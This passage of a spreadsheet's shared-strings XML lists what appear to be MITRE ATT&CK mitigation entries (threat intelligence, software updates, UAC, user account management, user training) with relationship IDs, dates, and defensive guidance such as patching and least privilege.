    <t>04 March 2021</t>
  </si>
  <si>
    <t>relationship--727520dd-a7ee-4665-a610-201f0d5e2f0e</t>
  </si>
  <si>
    <t>03 March 2021</t>
  </si>
  <si>
    <t>Avoid PowerShell profiles if not needed. Use the -No Profile flag with when executing PowerShell scripts remotely to prevent local profiles and scripts from being executed.</t>
  </si>
  <si>
    <t>relationship--ba660d12-81f6-49fe-baf2-fda6d5bda761</t>
  </si>
  <si>
    <t>relationship--1cd3a9af-420f-45b6-a8b1-246332b1c49d</t>
  </si>
  <si>
    <t>Ensure that endpoint defenses run in safe mode.(Citation: CyberArk Labs Safe Mode 2016)</t>
  </si>
  <si>
    <t>relationship--fa0217c0-038b-44ed-8e16-f23ceb01b6a8</t>
  </si>
  <si>
    <t>25 June 2021</t>
  </si>
  <si>
    <t>relationship--985f770f-6068-4c5c-9405-0515e43aeed5</t>
  </si>
  <si>
    <t>relationship--fe67405d-7fa3-4053-b52c-25dbd4ef3479</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</si>
  <si>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</si>
  <si>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relationship--005b46de-6241-413e-ba13-e0c2cc8efa77</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</si>
  <si>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</si>
  <si>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relationship--fe8f4b79-9495-4e08-b14e-d2954f847c78</t>
  </si>
  <si>
    <t>Configure browsers or tasks to regularly delete persistent cookies.</t>
  </si>
  <si>
    <t>relationship--248a0d72-d9cd-43d3-985f-a33a49a79e8b</t>
  </si>
  <si>
    <t>relationship--d9c08e10-909d-46d0-aa15-b99d1487be62</t>
  </si>
  <si>
    <t>Cloud service providers may allow customers to deactivate unused regions.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>relationship--70add783-c72c-4048-ba94-5e1e79c2d679</t>
  </si>
  <si>
    <t>Configure browsers/applications to regularly delete persistent web cookies.</t>
  </si>
  <si>
    <t>relationship--db2c5201-2ced-482d-913b-8dee1499441a</t>
  </si>
  <si>
    <t>relationship--10017b2e-7234-4368-81d7-a4c8b98c26a0</t>
  </si>
  <si>
    <t>M1019</t>
  </si>
  <si>
    <t>Threat Intelligence Program</t>
  </si>
  <si>
    <t>course-of-action--874c0166-e407-45c2-a1d9-e4e3a6570fd8</t>
  </si>
  <si>
    <t>Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.</t>
  </si>
  <si>
    <t>relationship--dbcd1bb0-24c3-465f-8b38-d4827ce6edf2</t>
  </si>
  <si>
    <t>relationship--c97a4bfd-e279-476d-a96b-c00335510a2c</t>
  </si>
  <si>
    <t>relationship--c6615e27-5984-44b3-82dc-f710c6823834</t>
  </si>
  <si>
    <t>relationship--7d9c5216-da63-4b8f-ade7-a1854e43bd3f</t>
  </si>
  <si>
    <t>Threat intelligence helps defenders and users be aware of and defend against common lures and active campaigns that have been used for impersonation.</t>
  </si>
  <si>
    <t>relationship--7a1b9942-4be4-4460-86b0-88638a1c4944</t>
  </si>
  <si>
    <t>M1051</t>
  </si>
  <si>
    <t>Update Software</t>
  </si>
  <si>
    <t>course-of-action--e5d930e9-775a-40ad-9bdb-b941d8dfe86b</t>
  </si>
  <si>
    <t>Upgrade to Windows 8 or later and enable secure boot.</t>
  </si>
  <si>
    <t>relationship--af684c27-a63f-4193-8293-f5b3554a3e58</t>
  </si>
  <si>
    <t>Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.</t>
  </si>
  <si>
    <t>relationship--e9fd0f73-917d-4d53-9843-a1314720942f</t>
  </si>
  <si>
    <t>04 May 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure operating systems and browsers are using the most current version. </t>
  </si>
  <si>
    <t>relationship--68e1b510-a985-467a-b3b6-03d5493e9b59</t>
  </si>
  <si>
    <t>03 April 2021</t>
  </si>
  <si>
    <t>Consider updating Windows to the latest version and patch level to utilize the latest protective measures against UAC bypass.(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>relationship--1b7972b8-9373-4f60-a0e5-7c1aca2c15a6</t>
  </si>
  <si>
    <t>Perform regular firmware updates to mitigate risks of exploitation and/or abuse.</t>
  </si>
  <si>
    <t>relationship--cabf9dce-fc94-45dc-a4b5-467465fa378d</t>
  </si>
  <si>
    <t>A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.</t>
  </si>
  <si>
    <t>relationship--8767be49-dbb2-493f-82b7-cc0053f02c8e</t>
  </si>
  <si>
    <t>A patch management process should be implemented to check unused applications, unmaintained and/or previously vulnerable software, unnecessary features, components, files, and documentation.</t>
  </si>
  <si>
    <t>relationship--e177cd6d-a6ca-4062-9dfe-e238e22c51a7</t>
  </si>
  <si>
    <t>Update software regularly to include patches that fix DLL side-loading vulnerabilities.</t>
  </si>
  <si>
    <t>relationship--1c47aa23-d267-49f3-9faf-c45b6de0ad6e</t>
  </si>
  <si>
    <t>Keep system images and software updated and migrate to SNMPv3.(Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>relationship--44930e59-94ae-40ff-bf9e-da00553620af</t>
  </si>
  <si>
    <t>Ensure all browsers and plugins kept updated can help prevent the exploit phase of this technique. Use modern browsers with security features turned on.</t>
  </si>
  <si>
    <t>relationship--47e2fc5c-3dab-411d-a402-0052d8e725d3</t>
  </si>
  <si>
    <t>Update software regularly by employing patch management for externally exposed applications.</t>
  </si>
  <si>
    <t>relationship--d373eebb-b578-4b59-9de1-2946bf837d96</t>
  </si>
  <si>
    <t>Update software regularly by employing patch management for internal enterprise endpoints and servers.</t>
  </si>
  <si>
    <t>relationship--3d58c303-b76c-4acc-8856-c71e03ea5c44</t>
  </si>
  <si>
    <t>relationship--5ef60d6b-ffc0-4630-98d7-a67b608d5707</t>
  </si>
  <si>
    <t>relationship--22d11711-5794-42aa-a9c5-02895fe3420d</t>
  </si>
  <si>
    <t>relationship--e395b033-b699-4360-a436-1daeada439a2</t>
  </si>
  <si>
    <t>Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.</t>
  </si>
  <si>
    <t>relationship--25a84607-970c-474e-83bc-143e2ccbb64b</t>
  </si>
  <si>
    <t>Apply patch KB2962486 which prevents credentials from being stored in GPPs.(Citation: ADSecurity Finding Passwords in SYSVOL)(Citation: MS14-025)</t>
  </si>
  <si>
    <t>relationship--92a0aa90-109d-41d7-a08a-6326480d02e6</t>
  </si>
  <si>
    <t>relationship--62c9a1c7-557e-433b-b422-3427a308f34e</t>
  </si>
  <si>
    <t>relationship--ae8a7787-7915-4dfa-bf79-73fd76dc6473</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</si>
  <si>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</si>
  <si>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relationship--7da3b985-e6ab-4e29-aa53-30a621bd48d3</t>
  </si>
  <si>
    <t>relationship--cff9e6c6-eb2d-431d-958c-d86ffe6ea98d</t>
  </si>
  <si>
    <t>relationship--39670e5f-214a-48b0-81df-01c1f5030cd7</t>
  </si>
  <si>
    <t>relationship--95313794-3eae-4cc3-89aa-4ad0d6d65572</t>
  </si>
  <si>
    <t xml:space="preserve">Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.(Citation: NSA Spotting) </t>
  </si>
  <si>
    <t>relationship--0c0cd7a2-496b-458d-b041-e05816450502</t>
  </si>
  <si>
    <t xml:space="preserve">Upgrade management services to the latest supported and compatible version.  Specifically, any version providing increased password complexity or policy enforcement preventing default or weak passwords. </t>
  </si>
  <si>
    <t>relationship--27e3d3fc-fdd5-48f3-98aa-6b374ff98ed1</t>
  </si>
  <si>
    <t>Update password managers regularly by employing patch management for internal enterprise endpoints and servers.</t>
  </si>
  <si>
    <t>relationship--2488fee3-78ad-4ea6-b111-2d0c372b36d2</t>
  </si>
  <si>
    <t>Patch the BIOS and EFI as necessary.</t>
  </si>
  <si>
    <t>relationship--3b2b3dfd-4126-4b04-b8a7-381b5cb61dbf</t>
  </si>
  <si>
    <t>relationship--21907ead-e794-49fd-aa4b-df2c51cdc599</t>
  </si>
  <si>
    <t>Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>relationship--33a54656-6370-4c22-af67-4ff528ba1568</t>
  </si>
  <si>
    <t>relationship--9c41bfe8-99bc-4aed-a8b9-9e19794a6c59</t>
  </si>
  <si>
    <t>relationship--3b883930-6ab6-40df-a652-956c2524f300</t>
  </si>
  <si>
    <t>relationship--1974c8c2-d97b-4ea3-9ed4-61a8d0cd2fdd</t>
  </si>
  <si>
    <t>M1052</t>
  </si>
  <si>
    <t>User Account Control</t>
  </si>
  <si>
    <t>course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808</t>
  </si>
  <si>
    <t>Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).</t>
  </si>
  <si>
    <t>relationship--6928abb5-b9b1-48d5-b3c5-8c7a94da5076</t>
  </si>
  <si>
    <t>Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.</t>
  </si>
  <si>
    <t>relationship--5329d477-4378-4635-8da8-ed427d7863fc</t>
  </si>
  <si>
    <t>relationship--86eb3c0d-b1c1-4b52-b802-18f321450f29</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</si>
  <si>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</si>
  <si>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relationship--681ea412-54a2-4580-960f-98e1219fff1f</t>
  </si>
  <si>
    <t>relationship--214e4329-960c-4c25-8620-b9573a6e06dc</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</si>
  <si>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</si>
  <si>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relationship--2dcd6644-f1d4-4001-81a5-95701fd29360</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</si>
  <si>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</si>
  <si>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relationship--df495b82-7bf4-4b1c-b72a-03dc1df07b7a</t>
  </si>
  <si>
    <t>M1018</t>
  </si>
  <si>
    <t>User Account Management</t>
  </si>
  <si>
    <t>course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317</t>
  </si>
  <si>
    <t>Limit the privileges of cloud accounts to assume, create, or impersonate additional roles, policies, and permissions to only those required. Where just-in-time access is enabled, consider requiring manual approval for temporary elevation of privileges.</t>
  </si>
  <si>
    <t>relationship--8052b9cf-2e89-49c4-a294-4ee42c6c6e03</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.  </t>
  </si>
  <si>
    <t>relationship--3c5f6c2a-7940-4cdc-8b25-811e33d9b96a</t>
  </si>
  <si>
    <t>Ensure that low-privileged user accounts do not have permissions to modify accounts or account-related policies.</t>
  </si>
  <si>
    <t>relationship--64628ae8-0bc8-428c-b7e5-1d738bc55e78</t>
  </si>
  <si>
    <t>Ensure that low-privileged user accounts do not have permission to add access keys to accounts. In AWS environments, prohibit users from calling the `sts:GetFederationToken` API unless explicitly required.(Citation: Crowdstrike AWS User Federation Persistence)</t>
  </si>
  <si>
    <t>relationship--561ccbcd-578f-4af2-81aa-8594796b6909</t>
  </si>
  <si>
    <t>Ensure that low-privileged user accounts do not have permissions to add permissions to accounts or update IAM policies.</t>
  </si>
  <si>
    <t>relationship--f9a0a532-21a6-47a2-83f8-4abb61cb3fc7</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure that low-privileged accounts do not have permissions to add permissions to accounts or to update container cluster roles. </t>
  </si>
  <si>
    <t>relationship--f91d058b-e69d-46ab-9ba0-f23c368b6190</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</si>
  <si>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</si>
  <si>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relationship--be34e043-48a0-4192-a877-e8520a2800cc</t>
  </si>
  <si>
    <t xml:space="preserve">
Consider limiting access to the BITS interface to specific users or groups.(Citation: Symantec BITS May 2007)</t>
  </si>
  <si>
    <t>relationship--279fa1bc-e514-4125-ab7e-51fb1da8a3f2</t>
  </si>
  <si>
    <t>Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) opportunities can limit the exposure to this technique.</t>
  </si>
  <si>
    <t>relationship--a9f79f14-d160-4be5-8bbe-ad0b52770b9f</t>
  </si>
  <si>
    <t>Proactively reset accounts that are known to be part of breached credentials either immediately, or after detecting bruteforce attempts.</t>
  </si>
  <si>
    <t>relationship--b61fb6ca-82b8-4928-8f1b-7a48645bd888</t>
  </si>
  <si>
    <t>Limit the privileges of user accounts so that only authorized administrators can edit system environment variables.</t>
  </si>
  <si>
    <t>relationship--fd47b0c7-e1d9-4e6d-8081-4e56ecb1ad03</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</si>
  <si>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</si>
  <si>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relationship--e73bf2f8-b009-4555-8fda-3407fa87c812</t>
  </si>
  <si>
    <t>Periodically review user accounts and remove those that are inactive or unnecessary. Limit the ability for user accounts to create additional accounts.</t>
  </si>
  <si>
    <t>relationship--ff397dfb-a231-423f-8be0-be01eb2c9d4d</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</si>
  <si>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</si>
  <si>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relationship--00c4456d-cea9-43bf-913b-ec566699ce61</t>
  </si>
  <si>
    <t>Enforce the principle of least-privilege by limiting dashboard visibility to only the resources required. This may limit the discovery value of the dashboard in the event of a compromised account.</t>
  </si>
  <si>
    <t>relationship--ba2b1689-b46c-4451-9618-1c1669a0da0c</t>
  </si>
  <si>
    <t>Restrict granting of permissions related to listing objects in cloud storage to necessary accounts.</t>
  </si>
  <si>
    <t>relationship--1a5f8d73-a9c4-40db-9cd5-7f8a7aea19d7</t>
  </si>
  <si>
    <t>Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization for code repositories.</t>
  </si>
  <si>
    <t>relationship--cb8572e5-de4e-4160-ba8c-d994ebd01e51</t>
  </si>
  <si>
    <t>Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization.</t>
  </si>
  <si>
    <t>relationship--e3d0073d-4507-4966-9cb0-787c02987186</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</si>
  <si>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</si>
  <si>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relationship--c55b71bd-89ee-411f-9bd9-d266e5c842a9</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</si>
  <si>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</si>
  <si>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relationship--4d98988c-bac6-48da-9bc8-6e4375317fd4</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate privilege escalation vectors so only authorized administrators can create container orchestration jobs.</t>
  </si>
  <si>
    <t>relationship--56efe93d-938a-4cad-ab2a-ff43a1f6e266</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</si>
  <si>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</si>
  <si>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relationship--cbb40150-0414-4b36-a28b-f7d2088f535a</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</si>
  <si>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</si>
  <si>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relationship--e6a74691-5e6a-49ef-b8dc-e3d9e28fe048</t>
  </si>
  <si>
    <t>An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.</t>
  </si>
  <si>
    <t>relationship--9da590e3-3447-4401-8ac7-f6c7482e4aed</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</si>
  <si>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</si>
  <si>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relationship--9ce9ab1f-b4fa-41e7-8302-11c30f918001</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and groups so that only authorized administrators can interact with system-level process changes and service configurations.</t>
  </si>
  <si>
    <t>relationship--06ef2810-b641-4142-83af-bbb00a598c11</t>
  </si>
  <si>
    <t>relationship--a69c1383-0afc-40d5-879c-fda561aff983</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</si>
  <si>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</si>
  <si>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relationship--be61d80d-2291-4572-960c-dd741534f855</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</si>
  <si>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</si>
  <si>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relationship--22dfe85e-3eeb-4b0a-ac61-b80f70a1f092</t>
  </si>
  <si>
    <t>relationship--8b3f2915-ca04-4770-88bb-e6f1314da34d</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</si>
  <si>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</si>
  <si>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relationship--393a7e7b-0fe7-4b93-920f-fc1b62652c5a</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</si>
  <si>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</si>
  <si>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relationship--264f59d1-abb8-4f79-8a32-49879700af15</t>
  </si>
  <si>
    <t>Limit which users are allowed to access compute infrastructure via cloud native methods.</t>
  </si>
  <si>
    <t>relationship--10e6a721-82f0-42a3-b454-da5e338c59f7</t>
  </si>
  <si>
    <t>Ensure only accounts required to configure and manage backups have the privileges to do so. Monitor these accounts for unauthorized backup activity.</t>
  </si>
  <si>
    <t>relationship--c4ef8c6f-2fbd-48aa-aff3-0830a01b5ebd</t>
  </si>
  <si>
    <t>Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with logging.</t>
  </si>
  <si>
    <t>relationship--f39d0966-e4d4-4d6e-813d-012a0674e466</t>
  </si>
  <si>
    <t>Ensure least privilege principles are applied to Identity and Access Management (IAM) security policies.(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>relationship--b29139fc-f053-44f7-9b5f-6029a984474d</t>
  </si>
  <si>
    <t>Configure default account policy to enable logging. Manage policies to ensure only necessary users have permissions to make changes to logging policies.</t>
  </si>
  <si>
    <t>relationship--29b03b8f-229b-44a9-a281-6e39edb86844</t>
  </si>
  <si>
    <t>An adversary must already have root level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.</t>
  </si>
  <si>
    <t>relationship--86a54cca-dc93-42a6-b1c9-01d11c57c6d0</t>
  </si>
  <si>
    <t>Ensure proper user permissions are in place to prevent adversaries from disabling or modifying firewall settings.</t>
  </si>
  <si>
    <t>relationship--c9f23224-fecf-48e8-867b-1c299fb40cf3</t>
  </si>
  <si>
    <t>Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security services.</t>
  </si>
  <si>
    <t>relationship--dddb38c9-408c-44da-9e51-3f7cd159c43d</t>
  </si>
  <si>
    <t>Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.(Citation: Wald0 Guide to GPOs)(Citation: Microsoft WMI Filters)(Citation: Microsoft GPO Security Filtering)</t>
  </si>
  <si>
    <t>relationship--7eeaeee6-9ac5-440f-9c31-2e4a915b637e</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.</t>
  </si>
  <si>
    <t>relationship--dff6f183-3444-474b-8d8a-1eb05e15a986</t>
  </si>
  <si>
    <t>relationship--f52e6fb6-754b-4b48-ab5b-eff0e6233d7d</t>
  </si>
  <si>
    <t>Limit access/authority to execute sensitive transactions, and switch to systems and procedures designed to authenticate/approve payments and purchase requests outside of insecure communication lines such as email.</t>
  </si>
  <si>
    <t>relationship--b549bba1-8a99-44f7-8aae-cd48838608f3</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</si>
  <si>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</si>
  <si>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relationship--f2d946f4-04fe-4b56-8152-80644b6b22d5</t>
  </si>
  <si>
    <t>relationship--57563748-1634-4625-baa4-73a4b1d7dbfb</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</si>
  <si>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</si>
  <si>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relationship--523ef32d-7463-4774-a473-fcccb5b0dadd</t>
  </si>
  <si>
    <t>Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security/logging services.</t>
  </si>
  <si>
    <t>relationship--7ef8afb4-2bfa-471b-a412-b1862418be3e</t>
  </si>
  <si>
    <t>Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls and cannot be manipulated by user accounts.</t>
  </si>
  <si>
    <t>relationship--83cedabf-9f63-4094-9f60-b545308c6dbb</t>
  </si>
  <si>
    <t>Limit the user accounts that have access to backups to only those required.</t>
  </si>
  <si>
    <t>relationship--d62f97e9-2b94-44d9-88db-99f849a804ec</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</si>
  <si>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</si>
  <si>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relationship--58e37620-7000-4ec2-95e0-e1c651fa215d</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.</t>
  </si>
  <si>
    <t>relationship--48c4d56e-e282-4810-b974-6a325b7d130d</t>
  </si>
  <si>
    <t>Prevent users from installing their own launch agents or launch daemons.</t>
  </si>
  <si>
    <t>relationship--e2bf1135-6715-446a-aff7-96d5a0a20477</t>
  </si>
  <si>
    <t>Limit the ability to access and export sensitive logs to privileged accounts where possible.</t>
  </si>
  <si>
    <t>relationship--510fefe4-1f76-4c33-a447-2f85e3dc87e2</t>
  </si>
  <si>
    <t>relationship--b32af0e2-1bdc-4b62-a95d-cd1d73919dba</t>
  </si>
  <si>
    <t>Ensure that proper policies are implemented to dictate the the secure enrollment and deactivation of authentication mechanisms, such as MFA, for user accounts.</t>
  </si>
  <si>
    <t>relationship--d3851a98-39b3-4105-ba93-c0cd91eb01eb</t>
  </si>
  <si>
    <t>Limit permissions to request quotas adjustments or modify tenant-level compute setting to only those required.</t>
  </si>
  <si>
    <t>relationship--16e9defb-683d-437c-9cdf-e1d75e5523dd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</si>
  <si>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</si>
  <si>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relationship--0b74039a-c985-4587-bed7-0876f2ef1e6c</t>
  </si>
  <si>
    <t>08 June 2020</t>
  </si>
  <si>
    <t>Ensure that proper policies are implemented to dictate the secure enrollment and deactivation of MFA for user accounts.</t>
  </si>
  <si>
    <t>relationship--21aa8534-0280-4109-8dfb-6adbc2310dd8</t>
  </si>
  <si>
    <t>19 July 2022</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</si>
  <si>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</si>
  <si>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relationship--f63970b4-a3fd-4fc9-8685-2baf0ff6ffff</t>
  </si>
  <si>
    <t>In cloud environments, ensure that users are not granted permissions to create or modify traffic mirrors unless this is explicitly required.</t>
  </si>
  <si>
    <t>relationship--075cdcb0-5a29-4ebb-bb0d-c2b22a5acec8</t>
  </si>
  <si>
    <t>Do not allow a domain user to be in the local administrator group on multiple systems.</t>
  </si>
  <si>
    <t>relationship--7e5e2fd3-cab4-4853-81ad-9bf50e1390bd</t>
  </si>
  <si>
    <t>Do not allow a user to be a local administrator for multiple systems.</t>
  </si>
  <si>
    <t>relationship--4ff3969a-4992-43c0-b4dc-02a21f5c9b2b</t>
  </si>
  <si>
    <t>Limit user accounts that can load or unload device drivers by disabling &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--ce95c6cf-0dc7-4f66-a329-7fbd833aa57e</t>
  </si>
  <si>
    <t>Limit remote user permissions if remote access is necessary.</t>
  </si>
  <si>
    <t>relationship--5fc1a3c2-dfdb-41d9-97cf-fa6825078bca</t>
  </si>
  <si>
    <t>relationship--8fae4ace-c3b5-4c4b-8c1a-98a32c692849</t>
  </si>
  <si>
    <t>relationship--e1b1a27e-2a62-4c73-9085-c98be89ff7ba</t>
  </si>
  <si>
    <t>Limit the accounts that may use remote services. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs.</t>
  </si>
  <si>
    <t>relationship--795ca238-c8cf-4735-98cc-593f1cc59b16</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</si>
  <si>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</si>
  <si>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relationship--9cf6e55f-3014-4292-a393-9418c6e6b4a1</t>
  </si>
  <si>
    <t>Limit which user accounts are allowed to login via SSH.</t>
  </si>
  <si>
    <t>relationship--b16c27b4-f94b-43e4-832d-986c03b96ffd</t>
  </si>
  <si>
    <t>In cloud environments, ensure that only users who explicitly require the permissions to update instance metadata or configurations can do so.</t>
  </si>
  <si>
    <t>relationship--1a545340-d4cf-40f1-a3e0-87ecdb957886</t>
  </si>
  <si>
    <t xml:space="preserve">Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. </t>
  </si>
  <si>
    <t>relationship--9fad01af-77b7-44b2-a3fc-0a7b338b9ace</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems.</t>
  </si>
  <si>
    <t>relationship--1d50b715-96a2-4fd6-bf92-603ad90730fd</t>
  </si>
  <si>
    <t>Enforce the principle of least privilege by limiting privileges of user accounts so only authorized accounts can modify and/or add server software components.(Citation: NSA and ASD Detect and Prevent Web Shells 2020)</t>
  </si>
  <si>
    <t>relationship--edbfcc84-4096-4839-b5eb-5025b70ccaca</t>
  </si>
  <si>
    <t>Remove permissions to create, modify, or run serverless resources from users that do not explicitly require them.</t>
  </si>
  <si>
    <t>relationship--cb2630a2-95a0-4ae8-a715-76899023d1b7</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.</t>
  </si>
  <si>
    <t>relationship--b5023b20-4243-4686-8b51-429ae7ac73cb</t>
  </si>
  <si>
    <t>relationship--112eb215-e03d-4c15-8e8d-3d1b5e1096c9</t>
  </si>
  <si>
    <t>relationship--714ba6ae-8c53-4ce1-81f4-4ca81bbdb9b7</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</si>
  <si>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</si>
  <si>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relationship--39080201-a56c-4daf-83b8-8ec09dd3baea</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</si>
  <si>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</si>
  <si>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relationship--0dfd9bcd-f9e2-44c1-9d87-07c626644561</t>
  </si>
  <si>
    <t xml:space="preserve">Azure AD Administrators apply limitations upon the ability for users to grant consent to unfamiliar or unverified third-party applications. </t>
  </si>
  <si>
    <t>relationship--a3a8c9e7-ed71-46c9-aa1f-c609406652b0</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</si>
  <si>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</si>
  <si>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relationship--d3e90e1c-b669-4909-ae44-75bfe8bf89e8</t>
  </si>
  <si>
    <t>relationship--64ebe849-d632-4af5-92b4-05e246b732c2</t>
  </si>
  <si>
    <t>Limit user access to system utilities such as `systemctl` to only users who have a legitimate need.</t>
  </si>
  <si>
    <t>relationship--751d1faf-0685-4a1b-8a72-de34bfd6da7e</t>
  </si>
  <si>
    <t>Limit user access to system utilities such as 'systemctl' or 'systemd-run' to users who have a legitimate need.</t>
  </si>
  <si>
    <t>relationship--dd3eb448-d9b3-4e25-b6ad-3992eee64ea8</t>
  </si>
  <si>
    <t>relationship--b811da67-8da1-4f2e-aae0-8666093cf95d</t>
  </si>
  <si>
    <t>relationship--4b3685f7-194e-466e-82a0-f8f112b224c1</t>
  </si>
  <si>
    <t>relationship--faecb2f6-1828-4b8e-bef8-f8f7a49340ca</t>
  </si>
  <si>
    <t>28 November 2022</t>
  </si>
  <si>
    <t>Limit user account and IAM policies to the least privileges required. Consider using temporary credentials for accounts that are only valid for a certain period of time to reduce the effectiveness of compromised accounts.</t>
  </si>
  <si>
    <t>relationship--27fde8e9-ab78-43aa-9642-14ac0cd958ff</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</si>
  <si>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</si>
  <si>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relationship--a42398e2-3daa-452a-80f8-f06660328f18</t>
  </si>
  <si>
    <t>Enforce the principle of least-privilege. Do not allow a domain user to be in the local administrator group on multiple systems.</t>
  </si>
  <si>
    <t>relationship--bdf60e66-264d-45ec-bb67-b74fa04fe28e</t>
  </si>
  <si>
    <t>Regularly audit user accounts for activity and deactivate or remove any that are no longer needed.</t>
  </si>
  <si>
    <t>relationship--555abf76-531f-4d35-9783-ed7c2a3f213b</t>
  </si>
  <si>
    <t>Enforce the principle of least privilege by limiting privileges of user accounts so only authorized accounts can modify the web directory.(Citation: NSA and ASD Detect and Prevent Web Shells 2020)</t>
  </si>
  <si>
    <t>relationship--c3b1f90e-6b04-4e6f-99ae-e63b1607f72c</t>
  </si>
  <si>
    <t>By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI.</t>
  </si>
  <si>
    <t>relationship--48e6b5fc-9d82-4cdf-84aa-bc23647e1234</t>
  </si>
  <si>
    <t>By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI.</t>
  </si>
  <si>
    <t>relationship--38a350e5-634c-4dcb-8f6c-0615cdb37864</t>
  </si>
  <si>
    <t xml:space="preserve">Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. </t>
  </si>
  <si>
    <t>relationship--d1667060-2bbe-41df-94eb-ce8b68fb084d</t>
  </si>
  <si>
    <t>Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.</t>
  </si>
  <si>
    <t>relationship--bfce35b9-7ae9-4194-83a7-5e5ff1481551</t>
  </si>
  <si>
    <t>21 April 2020</t>
  </si>
  <si>
    <t>Limit privileges of user accounts so only authorized privileged users can create and modify XDG autostart entries.</t>
  </si>
  <si>
    <t>relationship--884d34c0-8423-484f-8151-e158831d6531</t>
  </si>
  <si>
    <t>M1017</t>
  </si>
  <si>
    <t>User Training</t>
  </si>
  <si>
    <t>course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a</t>
  </si>
  <si>
    <t>Train users to be suspicious about certificate errors. Adversaries may use their own certificates in an attempt to intercept HTTPS traffic. Certificate errors may arise when the application’s certificate does not match the one expected by the host.</t>
  </si>
  <si>
    <t>relationship--59c65423-347b-4a09-a24d-c228faaa5119</t>
  </si>
  <si>
    <t>relationship--7833393c-1a00-432b-beed-8225f754a5bd</t>
  </si>
  <si>
    <t xml:space="preserve">
Close out all browser sessions when finished using them to prevent any potentially malicious extensions from continuing to run.</t>
  </si>
  <si>
    <t>relationship--bef3018a-1a38-4d1f-83ae-094f6c18f2a4</t>
  </si>
  <si>
    <t>Close all browser sessions regularly and when they are no longer needed.</t>
  </si>
  <si>
    <t>relationship--8d6d88c3-dbfe-492a-8c4c-ee4bfc10bdc3</t>
  </si>
  <si>
    <t>Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.</t>
  </si>
  <si>
    <t>relationship--7a5b9104-1fa8-4c55-9e03-f2faa3d2a6f7</t>
  </si>
  <si>
    <t>Ensure that developers and system administrators are aware of the risk associated with sharing unsecured passwords across communication services.</t>
  </si>
  <si>
    <t>relationship--db85d1cf-9aff-4214-9a56-2b21335c7cb7</t>
  </si>
  <si>
    <t>Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.</t>
  </si>
  <si>
    <t>relationship--c43e411a-6615-47f5-ba14-b62c78a61572</t>
  </si>
  <si>
    <t>17 May 2021</t>
  </si>
  <si>
    <t>Develop and publish policies that define acceptable information to be stored in code repositories.</t>
  </si>
  <si>
    <t>relationship--1e610bf7-149f-46f2-9177-cf5f745488ad</t>
  </si>
  <si>
    <t>Develop and publish policies that define acceptable information to be stored in Confluence repositories.</t>
  </si>
  <si>
    <t>relationship--4afd3659-dcb7-4f0a-938f-91599a4c4861</t>
  </si>
  <si>
    <t>Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers.</t>
  </si>
  <si>
    <t>relationship--934be676-4444-4ab3-a411-dc9a8dc9c4bb</t>
  </si>
  <si>
    <t>Develop and publish policies that define acceptable information to be stored in repositories.</t>
  </si>
  <si>
